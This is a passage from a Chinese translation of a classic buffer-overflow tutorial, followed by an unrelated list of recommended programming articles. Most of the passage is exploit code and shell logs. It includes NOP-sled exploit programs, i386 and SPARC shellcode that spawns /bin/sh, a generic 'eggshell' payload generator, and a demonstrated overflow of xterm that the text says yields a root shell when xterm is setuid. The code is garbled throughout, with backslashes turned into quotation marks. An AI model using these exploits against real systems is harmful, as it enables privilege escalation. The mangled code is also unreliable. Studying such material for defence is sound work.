都是相同的. 大多数程序不会一次向堆栈中压入成百上千字节的数据. 因此知道了堆栈
的开始地址, 我们可以试着猜出这个要使其溢出的缓冲区在哪. 下面的小程序会打印出
它的堆栈指针:

sp.c
------------------------------------------------------------------------------
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main() {
  printf("0x%x"n", get_sp());
}
------------------------------------------------------------------------------

------------------------------------------------------------------------------
[aleph1]$ ./sp
0x8000470
[aleph1]$
------------------------------------------------------------------------------

假定我们要使其溢出的程序如下:

vulnerable.c
------------------------------------------------------------------------------
void main(int argc, char *argv[]) {
  char buffer[512];

  if (argc > 1)
strcpy(buffer,argv[1]);
}
------------------------------------------------------------------------------

我们创建一个程序可以接受两个参数, 一是缓冲区大小, 二是从其自身堆栈指针算起
的偏移量(这个堆栈指针指明了我们想要使其溢出的缓冲区所在的位置). 我们把溢出字符
串放到一个环境变量中, 这样就容易操作一些.

exploit2.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                   0
#define DEFAULT_BUFFER_SIZE          512

char shellcode[] =
  ""xeb"x1f"x5e"x89"x76"x08"x31"xc0"x88"x46"x07"x89"x46"x0c"xb0"x0b"
  ""x89"xf3"x8d"x4e"x08"x8d"x56"x0c"xcd"x80"x31"xdb"x89"xd8"x40"xcd"
  ""x80"xe8"xdc"xff"xff"xff/bin/sh";

unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
printf("Can't allocate memory."n");
exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x"n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

  ptr += 4;
  for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

  buff[bsize - 1] = '"0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

现在我们尝试猜测缓冲区的大小和偏移量:

------------------------------------------------------------------------------
[aleph1]$ ./exploit2 500
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
[aleph1]$ exit
[aleph1]$ ./exploit2 600
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
Illegal instruction
[aleph1]$ exit
[aleph1]$ ./exploit2 600 100
Using address: 0xbffffd4c
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
[aleph1]$ ./exploit2 600 200
Using address: 0xbffffce8
[aleph1]$ ./vulnerable $EGG
Segmentation fault
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit2 600 1564
Using address: 0xbffff794
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------

正如我们所看到的, 这并不是一个很有效率的过程. 即使知道了堆栈的起始地址, 尝
试猜测偏移量也几乎是不可能的. 我们很可能要试验几百次, 没准几千次也说不定. 问题
的关键在于我们必须*确切*地知道我们代码开始的地址. 如果偏差哪怕只有一个字节我们
也只能得到段错误或非法指令错误. 提高成功率的一种方法是在我们溢出缓冲区的前段填
充NOP指令. 几乎所有的处理器都有NOP指令执行空操作. 常用于延时目的. 我们利用它来
填充溢出缓冲区的前半段. 然后把shellcode放到中段, 之后是返回地址. 如果我们足够
幸运的话, 返回地址指到NOPs字串的任何位置, NOP指令就会执行, 直到碰到我们的
shellcode. 在Intel体系结构中NOP指令只有一个字节长, 翻译为机器码是0x90. 假定堆栈
的起始地址是0xFF, S代表shellcode, N代表NOP指令, 新的堆栈看起来是这样:

内存低    DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF    内存高
地址    89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF    地址
         buffer             sfp ret a    b    c

<------ [NNNNNNNNNNNSSSSSSSSS][0xDE][0xDE][0xDE][0xDE][0xDE]
               ^                   |
               |_____________________|

堆栈顶端                                                       堆栈底部

新的破解程序如下:

exploit3.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                   0
#define DEFAULT_BUFFER_SIZE          512
#define NOP                         0x90

char shellcode[] =
  ""xeb"x1f"x5e"x89"x76"x08"x31"xc0"x88"x46"x07"x89"x46"x0c"xb0"x0b"
  ""x89"xf3"x8d"x4e"x08"x8d"x56"x0c"xcd"x80"x31"xdb"x89"xd8"x40"xcd"
  ""x80"xe8"xdc"xff"xff"xff/bin/sh";

unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
printf("Can't allocate memory."n");
exit(0);
  }

  addr = get_sp() - offset;
  printf("Using address: 0x%x"n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

  for (i = 0; i < bsize/2; i++)
buff[i] = NOP;

  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

  buff[bsize - 1] = '"0';

  memcpy(buff,"EGG=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

我们所使用的缓冲区大小最好比要使其溢出的缓冲区大100字节左右. 我们在要使其
溢出的缓冲区尾部放置shellcode, 为NOP指令留下足够的空间, 仍然使用我们推测的地址
来覆盖返回地址. 这里我们要使其溢出的缓冲区大小是512字节, 所以我们使用612字节.
现在使用新的破解程序来使我们的测试程序溢出:

------------------------------------------------------------------------------
[aleph1]$ ./exploit3 612
Using address: 0xbffffdb4
[aleph1]$ ./vulnerable $EGG
$
------------------------------------------------------------------------------

哇!一击中的!这个改进成千倍地提高了我们的命中率. 下面在真实的环境中尝试一
下缓冲区溢出. 在Xt库上运用我们所讲述的方法. 在例子中, 我们使用xterm(实际上所有
连接Xt库的程序都有漏洞). 计算机上要运行X Server并且允许本地的连接. 还要相应设
置DISPLAY变量.

------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit3 1124
Using address: 0xbffffdb4
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "隵1F
                        °

                        骎

?へ@よ?in/shいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいいい
いいいいいいいいいいいいいいいいいいいいいいいいい¤

(此处截短多行输出)

いいいいいいいいいいい?いいいい
^C
[aleph1]$ exit
[aleph1]$ ./exploit3 2148 100
Using address: 0xbffffd48
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "隵1F
                        °

                        骎

?へ@よ?in/sh
¤

(此处截短多行输出)

縃arning: some arguments in previous message were lost
Illegal instruction
[aleph1]$ exit
.
.
.
[aleph1]$ ./exploit4 2148 600
Using address: 0xbffffb54
[aleph1]$ /usr/X11R6/bin/xterm -fg $EGG
Warning: Color name "隵1F
                        °

                        骎

?へ@よ?in/sh鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗
鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗?

(此处截短多行输出)

縏鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸗鸚arning: some arguments in previous message were lost
bash$
------------------------------------------------------------------------------

尤里卡! 仅仅几次尝试我们就成功了!如果xterm是带suid root安装的, 我们就已经
得到了一个root shell了.

小缓冲区的溢出
                           ~~~~~~~~~~~~~~~~

有时候想使其溢出的缓冲区太小了, 以至于shellcode都放不进去, 这样返回地址就
会被指令所覆盖, 而不是我们所推测的地址, 或者shellcode是放进去了, 但是没法填充
足够多的NOP指令, 这样推测地址的成功率就很低了. 要从这样的程序(小缓冲区)里得到
一个shell, 我们必须得想其他办法. 下面介绍的这种方法只在能够访问程序的环境变量
时有效.

我们所做的就是把shellcode放到环境变量中去, 然后用这个变量在内存中的地址来
使缓冲区溢出. 这种方法同时也提高了破解工作的成功率, 因为保存shellcode的环境变
量想要多大就有多大.

当程序开始时, 环境变量存储在堆栈的顶部, 任何使用setenv()的修改动作会在其他
地方重新分配空间. 开始时的堆栈如下所示:

   <strings><argv pointers>NULL<envp pointers>NULL<argc><argv><envp>

我们新的程序会使用一个额外的变量, 变量的大小能够容纳shellcode和NOP指令,
新的破解程序如下所示:

exploit4.c
------------------------------------------------------------------------------
#include <stdlib.h>

#define DEFAULT_OFFSET                   0
#define DEFAULT_BUFFER_SIZE          512
#define DEFAULT_EGG_SIZE             2048
#define NOP                         0x90

char shellcode[] =
  ""xeb"x1f"x5e"x89"x76"x08"x31"xc0"x88"x46"x07"x89"x46"x0c"xb0"x0b"
  ""x89"xf3"x8d"x4e"x08"x8d"x56"x0c"xcd"x80"x31"xdb"x89"xd8"x40"xcd"
  ""x80"xe8"xdc"xff"xff"xff/bin/sh";

unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  if (!(buff = malloc(bsize))) {
printf("Can't allocate memory."n");
exit(0);
  }
  if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory."n");
exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x"n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

  buff[bsize - 1] = '"0';
  egg[eggsize - 1] = '"0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/bin/bash");
}
------------------------------------------------------------------------------

用这个新的破解程序来试试我们的漏洞测试程序:

------------------------------------------------------------------------------
[aleph1]$ ./exploit4 768
Using address: 0xbffffdb0
[aleph1]$ ./vulnerable $RET
$
------------------------------------------------------------------------------

成功了, 再试试xterm:

------------------------------------------------------------------------------
[aleph1]$ export DISPLAY=:0.0
[aleph1]$ ./exploit4 2148
Using address: 0xbffffdb0
[aleph1]$ /usr/X11R6/bin/xterm -fg $RET
Warning: Color name
"挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨
挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨挨

(此处截短多行输出)

挨挨挨
Warning: some arguments in previous message were lost
$
------------------------------------------------------------------------------

一次成功! 它显著提高了我们的成功率. 依赖于破解程序和被破解程序比较环境数据
的多少, 我们推测的地址可能高也可能低于真值. 正和负的偏移量都可以试一试.


                           寻找缓冲区溢出漏洞
                           ~~~~~~~~~~~~~~~~~~~~~

如前所述, 缓冲区溢出是向一个缓冲区填充超过其处理能力的信息造成的结果. 由于C
语言没有任何内置的边界检查, 写入一个字符数组时, 如果超越了数组的结尾就会造成溢
出. 标准C语言库提供了一些没有边界检查的字符串复制或添加函数. 包括strcat(),
strcpy(), sprintf(), and vsprintf(). 这些函数对一个null结尾的字符串进行操作, 并
不检查溢出情况. gets()函数从标准输入中读取一行到缓冲区中, 直到换行或EOF. 它也不
检查缓冲区溢出. scanf()函数族在匹配一系列非空格字符(%s), 或从指定集合(%[])中匹
配非空系列字符时, 使用字符指针指向数组, 并且没有定义最大字段宽度这个可选项, 就
可能出现问题. 如果这些函数的目标地址是一个固定大小的缓冲区, 函数的另外参数是由
用户以某种形式输入, 则很有可能利用缓冲区溢出来破解它.

另一种常见的编程结构是使用while循环从标准输入或某个文件中一次读入一个字符到
缓冲区中, 直到行尾或文件结尾, 或者碰到别的什么终止符. 这种结构通常使用getc(),
fgetc(), 或getchar()函数中的某一个. 如果在while循环中没有明确的溢出检查, 这种程
序就很容易被破解.

由此可见, grep(1)是一个很好的工具命令(帮助你找到程序中可能有的漏洞). 自由操
作系统及其工具的源码是可读的. 当你意识到其实很多商业操作系统工具都和自由软件有
着相同的源码时, 剩下的事情就简单了!  :-)


               附录 A - 不同操作系统/体系结构的shellcode
               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

i386/Linux
------------------------------------------------------------------------------
      jmp 0x1f
      popl %esi
      movl %esi,0x8(%esi)
      xorl %eax,%eax
      movb %eax,0x7(%esi)
      movl %eax,0xc(%esi)
      movb $0xb,%al
      movl %esi,%ebx
      leal 0x8(%esi),%ecx
      leal 0xc(%esi),%edx
      int $0x80
      xorl %ebx,%ebx
      movl %ebx,%eax
      inc %eax
      int $0x80
      call -0x24
      .string ""/bin/sh""
------------------------------------------------------------------------------

SPARC/Solaris
------------------------------------------------------------------------------
      sethi 0xbd89a, %l6
      or    %l6, 0x16e, %l6
      sethi 0xbdcda, %l7
      and    %sp, %sp, %o0
      add    %sp, 8, %o1
      xor    %o2, %o2, %o2
      add    %sp, 16, %sp
      std    %l6, [%sp - 16]
      st    %sp, [%sp - 8]
      st    %g0, [%sp - 4]
      mov    0x3b, %g1
      ta    8
      xor    %o7, %o7, %o0
      mov    1, %g1
      ta    8
------------------------------------------------------------------------------

SPARC/SunOS
------------------------------------------------------------------------------
      sethi 0xbd89a, %l6
      or    %l6, 0x16e, %l6
      sethi 0xbdcda, %l7
      and    %sp, %sp, %o0
      add    %sp, 8, %o1
      xor    %o2, %o2, %o2
      add    %sp, 16, %sp
      std    %l6, [%sp - 16]
      st    %sp, [%sp - 8]
      st    %g0, [%sp - 4]
      mov    0x3b, %g1
      mov    -0x1, %l5
      ta    %l5 + 1
      xor    %o7, %o7, %o0
      mov    1, %g1
      ta    %l5 + 1
------------------------------------------------------------------------------

                  附录 B - 通用缓冲区溢出程序
                  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shellcode.h
------------------------------------------------------------------------------
#if defined(__i386__) && defined(__linux__)

#define NOP_SIZE       1
char nop[] = ""x90";
char shellcode[] =
  ""xeb"x1f"x5e"x89"x76"x08"x31"xc0"x88"x46"x07"x89"x46"x0c"xb0"x0b"
  ""x89"xf3"x8d"x4e"x08"x8d"x56"x0c"xcd"x80"x31"xdb"x89"xd8"x40"xcd"
  ""x80"xe8"xdc"xff"xff"xff/bin/sh";

unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

#elif defined(__sparc__) && defined(__sun__) && defined(__svr4__)

#define NOP_SIZE       4
char nop[]=""xac"x15"xa1"x6e";
char shellcode[] =
  ""x2d"x0b"xd8"x9a"xac"x15"xa1"x6e"x2f"x0b"xdc"xda"x90"x0b"x80"x0e"
  ""x92"x03"xa0"x08"x94"x1a"x80"x0a"x9c"x03"xa0"x10"xec"x3b"xbf"xf0"
  ""xdc"x23"xbf"xf8"xc0"x23"xbf"xfc"x82"x10"x20"x3b"x91"xd0"x20"x08"
  ""x90"x1b"xc0"x0f"x82"x10"x20"x01"x91"xd0"x20"x08";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#elif defined(__sparc__) && defined(__sun__)

#define NOP_SIZE       4
char nop[]=""xac"x15"xa1"x6e";
char shellcode[] =
  ""x2d"x0b"xd8"x9a"xac"x15"xa1"x6e"x2f"x0b"xdc"xda"x90"x0b"x80"x0e"
  ""x92"x03"xa0"x08"x94"x1a"x80"x0a"x9c"x03"xa0"x10"xec"x3b"xbf"xf0"
  ""xdc"x23"xbf"xf8"xc0"x23"xbf"xfc"x82"x10"x20"x3b"xaa"x10"x3f"xff"
  ""x91"xd5"x60"x01"x90"x1b"xc0"x0f"x82"x10"x20"x01"x91"xd5"x60"x01";

unsigned long get_sp(void) {
  __asm__("or %sp, %sp, %i0");
}

#endif
------------------------------------------------------------------------------

eggshell.c
------------------------------------------------------------------------------
/*
* eggshell v1.0
*
* Aleph One / [email][email protected][/email]
*/
#include <stdlib.h>
#include <stdio.h>
#include "shellcode.h"

#define DEFAULT_OFFSET                   0
#define DEFAULT_BUFFER_SIZE          512
#define DEFAULT_EGG_SIZE             2048

void usage(void);

void main(int argc, char *argv[]) {
  char *ptr, *bof, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, n, m, c, align=0, eggsize=DEFAULT_EGG_SIZE;

  while ((c = getopt(argc, argv, "a:b:e:")) != EOF)
switch (c) {
   case 'a':
      align = atoi(optarg);
      break;
   case 'b':
      bsize = atoi(optarg);
      break;
   case 'e':
      eggsize = atoi(optarg);
      break;
   case 'o':
      offset = atoi(optarg);
      break;
   case '?':
      usage();
      exit(0);
}

  if (strlen(shellcode) > eggsize) {
printf("Shellcode is larger the the egg."n");
exit(0);
  }

  if (!(bof = malloc(bsize))) {
printf("Can't allocate memory."n");
exit(0);
  }
  if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory."n");
exit(0);
  }

  addr = get_sp() - offset;
  printf("[ Buffer size:"t%d"t"tEgg size:"t%d"tAligment:"t%d"t]"n",
bsize, eggsize, align);
  printf("[ Address:"t0x%x"tOffset:"t"t%d"t"t"t"t]"n", addr, offset);

  addr_ptr = (long *) bof;
  for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i <= eggsize - strlen(shellcode) - NOP_SIZE; i += NOP_SIZE)
for (n = 0; n < NOP_SIZE; n++) {
   m = (n + align) % NOP_SIZE;
   *(ptr++) = nop[m];
}

  for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];

  bof[bsize - 1] = '"0';
  egg[eggsize - 1] = '"0';

  memcpy(egg,"EGG=",4);
  putenv(egg);

  memcpy(bof,"BOF=",4);
  putenv(bof);
  system("/bin/sh");
}

void usage(void) {
  (void)fprintf(stderr,
"usage: eggshell [-a <alignment>] [-b <buffersize>] [-e <eggsize>] [-o <offs
et>]"n");
}
------------------------------------------------------------------------------

你可能感兴趣的:(缓冲区溢出的原理和实践)

华为OD机试真题----日志采集(java) 努力努力再努力呐算法华为od 算法数据结构 java
华为OD机试真题中的“日志采集”是一个重要的题目，它主要考察的是如何在满足特定条件下，优化日志上报策略以获取最大积分。以下是对该题目的详细解析：一、题目背景日志采集是运维系统的核心组件，日志是按行生成，每行记做一条，由采集系统分批上报。上报策略的设计需要平衡多个因素：上报频率、服务端压力、用户体验以及避免超时失败。二、上报策略根据题目描述，项目组设计了以下上报策略：奖励机制：每成功上报一条日志，奖
华为OD机试题库清单以及考点说明，2025.3.16切换2025A卷（Python/JS/C/C++）哪吒搬砖工逆袭Java架构师华为od python javascript 2025A卷华为OD机试
专栏导读本专栏收录于《华为OD机试真题（Python/JS/C/C++）》。刷的越多，抽中的概率越大，私信哪吒，备注华为OD，加入华为OD刷题交流群，每一题都有详细的答题思路、详细的代码注释、3个测试用例、为什么这道题采用XX算法、XX算法的适用场景，发现新题目，随时更新。2024年8月14日，华为官方已经将华为OD机试（D卷）切换为E卷。目前正在考的是E卷，按照华为OD往常的操作，E卷题目是由往
华为OD机试 - 字符串分割转换（Python/JS/C/C++ 2024 E卷 100分）哪吒华为od python javascript
一、题目描述给定一个非空字符串QS，其被N个‘;’分隔成N+1个子串，给定正整数数组K，要求除第一个子串外，其余的子串每K个字符组成新的子串，并‘-’分隔。对于新组成的每一个子串，如果它含有的小写字母比大写字母多，则将这个子串的所有大写字母转换为小写Q字母；反之，如果它含有的大写字母比小写字母多，则将这个子串的所有小写字母转换为大写字母；大小写字母的数量相等时，不做转换。二、输入描述输入为两行，第
【深度学习遥感分割|论文解读2】UNetFormer：一种类UNet的Transformer，用于高效的遥感城市场景图像语义分割 985小水博一枚呀论文解读深度学习 transformer 人工智能网络 cnn
【深度学习遥感分割|论文解读2】UNetFormer：一种类UNet的Transformer，用于高效的遥感城市场景图像语义分割【深度学习遥感分割|论文解读2】UNetFormer：一种类UNet的Transformer，用于高效的遥感城市场景图像语义分割文章目录【深度学习遥感分割|论文解读2】UNetFormer：一种类UNet的Transformer，用于高效的遥感城市场景图像语义分割2.Re
IT圈大实话！卷运维不如卷网络安全，这可能是你转行的最后的机会程序员晓晓运维 web安全干货分享计算机网络安全渗透测试职场发展
前言2025年马上进入金三银四的行情，最近我也去问了一下行业内的小伙伴，我发现最近很多从事运维的选择了辞职，转行到了网络安全这个发展路线。说实话，运维工程师这个岗位在IT行业里面确实是处于最底层的，不管什么环节出现问题，基本都是运维背锅。，薪资水平也比不上别的岗位。一般运维的薪资水平大多数都是6-9K，还要高频出差年轻的时候干几年确实还可以，但是成家立业之后就不合适到处出差了。运维的事情非常多，不
Python 数据分析实战：电动汽车行业发展态势与市场策略洞察萧十一郎@ python python 数据分析开发语言
目录一、案例背景二、代码实现2.1数据收集与导入2.2数据探索性分析2.3数据清洗2.4数据分析2.4.1市场规模与增长趋势2.4.2消费者需求分析2.4.3企业竞争格局2.4.4政策影响分析2.4.5构建消费者购买意愿预测模型三、主要的代码难点解析3.1数据收集与导入3.2数据清洗-缺失值处理3.3数据清洗-异常值处理3.4数据分析-消费者需求分析3.5数据分析-构建消费者购买意愿预测模型四、可
python实现http协议 ajie1117 python http 开发语言
在Python中，可以使用socket库实现一个简单的HTTP服务器和客户端，手动处理HTTP请求和响应。下面是一个Python版本的HTTP服务器和客户端示例。一、使用socket实现HTTP服务器HTTP服务器的基本原理是监听指定端口，等待客户端请求，解析HTTP请求，并返回HTTP响应。简单的HTTP服务器importsocketdefrun_http_server(host='127.0.
智能小程序 Ray 开发界面 API —— 交互 API 合集 IoT砖家涂拉拉前端 javascript 开发语言小程序 API SDK 物联网
showModal显示模态对话框引入import{showModal}from'@ray-js/ray';需引入BaseKit，且在>=1.2.10版本才可使用参数Objectobject属性类型默认值必填说明titlestring是提示的标题contentstring否提示的内容showCancelboolean否是否显示取消按钮cancelTextstring否取消按钮的文字，最多4个字符ca
在Ubuntu上安装MEAN Stack的4个步骤 Kaede6 技术文章-Linux服务部署 ubuntu linux 运维
在Ubuntu上安装MEANStack的4个步骤为：1.安装MEAN；2.安装MongoDB；3.安装NodeJS，Git和NPM；4.安装剩余的依赖项。什么是MEANStack？平均堆栈一直在很大程度上升高为基于稳健的基于JavaScript的开发堆栈。名称的意思是指其组件;MongoDB，ExpressJS，Angularjs和NodeJS。第1步：安装MEAN对于此安装，我们将在本指南中使用
C++语言的声明式编程俞嫦曦包罗万象 golang 开发语言后端
C++语言的声明式编程引言声明式编程是一种编程范式，它强调描述程序的“要做什么”而不是“怎么做”。在传统的命令式编程中，程序员通常需要详细地指定操作步骤，而在声明式编程中，程序员则可以专注于结果的描述。这一编程风格在C++语言的使用中，虽然不如某些其他语言（如Haskell或SQL）那样突出，但依然通过一些特性和标准库提供了支持。本文将深入探讨C++中的声明式编程，包括其基本概念、与命令式编程的对
COBOL语言的信号量俞嫦曦包罗万象 golang 开发语言后端
COBOL语言中的信号量机制引言在现代计算机科学中，信号量作为一种同步机制，广泛应用于多线程和并发编程中。尽管COBOL（CommonBusinessOrientedLanguage）是一种相对较老的编程语言，但它依然被一些企业应用于业务系统中。本文将深入探讨COBOL语言中的信号量机制，包括其基本概念、实现方法，以及在实际应用中的示例。信号量的基本概念信号量是一种用于管理访问共享资源的同步工具。
Objective-C语言的网络编程俞嫦曦包罗万象 golang 开发语言后端
Objective-C语言中的网络编程引言Objective-C是一种面向对象的编程语言，广泛应用于iOS和macOS应用程序的开发。随着移动互联网的快速发展，网络编程成为了现代应用程序开发中不可或缺的一部分。无论是从服务器获取数据、上传文件，还是实现实时通信，网络编程都扮演着至关重要的角色。本文将深入探讨Objective-C语言中的网络编程，涵盖从基础的网络请求到高级的异步处理、安全通信等内容
Lisp语言的云存储俞嫦曦包罗万象 golang 开发语言后端
Lisp语言的云存储：构建智能化数据管理新时代引言随着信息技术的飞速发展，数据的生产和存储呈现出爆炸式增长。云存储作为一种新兴的数据管理方式，逐渐成为各行业必不可少的基础设施。尤其是在大数据、人工智能等领域，对数据的快速访问和高效存储要求尤为迫切。与此同时，Lisp语言作为一种历史悠久且具有强大表达能力的编程语言，通过其特有的特性，可以在云存储的架构设计与实现方面发挥独特的优势。本文将深入探讨Li
画面+音频实时去重，青否数字人最新技术已上线！ 2501_91000143 数字人直播音视频人工智能
先预告下，青否数字人3月下旬将迎来一次超级重磅的版本发布。这将彻底颠覆你对直播数字人的认知！在手持样品讲解时，数字人主播能够精准输出产品话术。告别传统数字人一直不停歇的讲解，可自主暂停讲解、喝水、进出镜头、更换服饰，直播节奏比真人更自然。作为AI直播私有化部署行业引领者，青否数字人一直保持每周迭代的更新速度，持续引领行业前沿。接下来，为您深度揭秘3月中上旬推出的重磅新功能：AI话术5.0：AI泛化
TypeScript语言的网络编程俞嫦曦包罗万象 golang 开发语言后端
TypeScript语言的网络编程引言随着现代网络应用程序的不断发展，对编程语言的需求也在不断提高。JavaScript作为前端开发的主要语言，凭借其动态特性和广泛的应用，成为了Web开发的中坚力量。而TypeScript作为JavaScript的超集，逐渐在开发社区中获得了越来越多的关注。其静态类型的特性使得开发者在编写大型应用程序时能够更加得心应手。尤其是在网络编程方面，TypeScript展
重生之——我用WeakMap和Symbol缔造专属于我的金丝雀~~~【使用WeakMap和Symbol实现属性私有】被夏油狠狠爱的悟 JS 前端 javascript 开发语言 WeakMap class 类 Symbol
#今日份大脑爆炸##看完下面内容包你更进一步理解WeakMap!#不想属性被外人看见？不想是个人都能看见你的属性？那就看看WeakMap，帮你轻松实现你的目标！1.WeakMap：第一版：//WeakMap管理私有属性：consthost=newWeakMap()//这里创建了一个WeakMap实例host,用于存储每个User实例的host属性classUser{constructor(url)
C++学习笔记:函数重载及函数模板 etp_ c++学习笔记
函数重载默认参数能让你使用不同数目的参数调用同一个函数，而函数多态（函数重载）能让你使用多个同名函数。----一般完成类似的工作，但一定使用不同的参数列表（函数特征标）。下面定义一组原型如下的print()函数voidprint(constchar*str,intwidth);voidprint(doubled,intwidth);voidprint(longl,intwidth);编译器根据参数
Git 分支使用规范全解（附项目示例）滴答滴答滴嗒滴开发 Ai 入门指南 git elasticsearch 大数据个人开发
Git分支使用规范全解（附项目示例）本文结合实际项目开发，详细讲解如何在多人协作中使用Git分支，包括main、develop、feature/*、bugfix/*、release/*、hotfix/*等分支类型。场景背景：开发一个“智能垃圾分类系统”目标是开发一套运行于边缘设备上的垃圾识别系统，使用AI算法模型识别投放物，并分类投放，同时配有后台管理页面。分支说明与实际应用示例main分支（生产
【SoC基础】单片机之RCC模块望闻问嵌 #SoC 单片机
：如果你也对机器人、人工智能感兴趣，看来我们志同道合✨：不妨浏览一下我的博客主页【https://blog.csdn.net/weixin_51244852】：文章若有幸对你有帮助，可点赞收藏⭐不迷路：内容若有错误，敬请留言指正！原创文，转载注明出处RCC模块简介RCC（ResetandClockControl）即复位和时钟控制模块，其基本功能总结如下：时钟源管理多源选择：支持多种时钟源，包含内部
华为OD机试 - 日志采集系统（Python/JS/C/C++ 2024 E卷 100分）哪吒华为od python javascript
华为OD机试2024E卷题库疯狂收录中，刷题点这里专栏导读本专栏收录于《华为OD机试真题（Python/JS/C/C++）》。刷的越多，抽中的概率越大，私信哪吒，备注华为OD，加入华为OD刷题交流群，每一题都有详细的答题思路、详细的代码注释、3个测试用例、为什么这道题采用XX算法、XX算法的适用场景，发现新题目，随时更新。一、题目描述日志采集是运维系统的的核心组件。日志是按行生成，每行记做一条，由
汽车PKE无钥匙进入系统一键启动系统定义与原理 zsmydz888 汽车无钥匙进入系统汽车无钥匙启动汽车
汽车智能钥匙（PKE无钥匙进入系统）一键启动介绍系统定义与原理汽车无钥匙进入系统，简称PKE（PassiveKeylessEntry），该系统采用了RFID无线射频技术和车辆身份编码识别系统，率先应用小型化、小功率射频天线的开发方案，并成功融合了遥控系统和无钥匙系统。它使用无线电波，使车主无需按下任何按钮即可解锁或锁定车辆。一键启动智能钥匙系统主要由无匙进入和一键启动两部分构成，无匙进入技术通过在
用Python抓取网页标题：使用`requests`库的实用指南清水白石008 python Python题库 python 开发语言
用Python抓取网页标题：使用requests库的实用指南在数据获取的时代，网页抓取（WebScraping）成为了一项重要的技能。无论是获取新闻标题、产品价格，还是数据分析，网页抓取都能提供丰富的信息。本文将详细介绍如何使用Python的requests库编写一个简单的爬虫，抓取某个网站的标题。我们将通过实例和代码片段，使整个过程清晰易懂，帮助你快速上手网页抓取。一、了解网页抓取网页抓取是指通
GPT-4o mini小型模型具备卓越的文本智能和多模态推理能力 FlowUs息流使用宝典 GPT-4o mini
GPT-4omini是首个应用OpenAI指令层次结构方法的模型，这有助于增强模型抵抗越狱、提示注入和系统提示提取的能力。这使得模型的响应更加可靠，并有助于在大规模应用中更安全地使用。GPT-4omini在学术基准测试中，无论是在文本智能还是多模态推理方面，都超越了GPT-3.5Turbo和其他小型模型，并支持与GPT-4o相同的语言范围。它在函数调用方面也表现出色，这使开发者能够构建应用程序来从
